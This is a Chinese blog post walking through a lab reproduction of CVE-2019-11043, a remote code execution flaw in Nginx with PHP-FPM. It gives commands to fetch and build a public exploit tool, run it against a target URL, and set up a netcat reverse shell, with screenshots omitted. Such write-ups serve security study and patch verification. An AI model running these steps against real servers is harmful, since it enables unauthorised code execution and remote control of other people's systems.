欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CVE-2019-11043复现

程序员文章站 2022-03-24 11:02:24
...

 

 

  • 01

 

CVE-2019-11043复现

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

 

漏洞环境:  

先把exp克隆到本地。

 

git clone https://github.com/neex/phuip-fpizdam.git

 

CVE-2019-11043复现

安装go环境

wget -c https://storage.googleapis.com/golang/go1.13.3.linux-amd64.tar.gz

 

把文件解压到/usr/local 目录

tar -C /usr/local/ -xzf go1.13.3.linux-amd64.tar.gz

编辑/etc/profile,在文件的最后加上

export PATH=$PATH:/usr/local/go/bin

保存退出后执行 source /etc/profile

然后进行编译,在编译的过程中会出现下面的报错,原因是go mod国内被墙了。

CVE-2019-11043复现

所以我们要为go环境变量设置proxy

go env -w GOPROXY=https://goproxy.io,directgo env -w GOPRIVATE=*.corp.example.comgo env -w GO111MODULE=on

CVE-2019-11043复现

 

  • 02

 

CVE-2019-11043复现

 

以上准备好之后就可以利用漏洞了。

 

漏洞利用:  

该靶场在Ip:8080。

CVE-2019-11043复现

用exp执行下面命令

phuip-fpizdam.exe http://x.x.x.x:8080/index.php

CVE-2019-11043复现

然后就可以执行命令了

CVE-2019-11043复现

反弹shell:  

给此docer容器装一个 nc

apt-get updateapt-get install -y netcat

然后攻击机开启监听,执行命令等待shell反弹

CVE-2019-11043复现

CVE-2019-11043复现

 

参考连接:

http://blog.leanote.com/post/snowming/9da184ef24bd

CVE-2019-11043复现

CVE-2019-11043复现

CVE-2019-11043复现

 

相关标签: 执行代码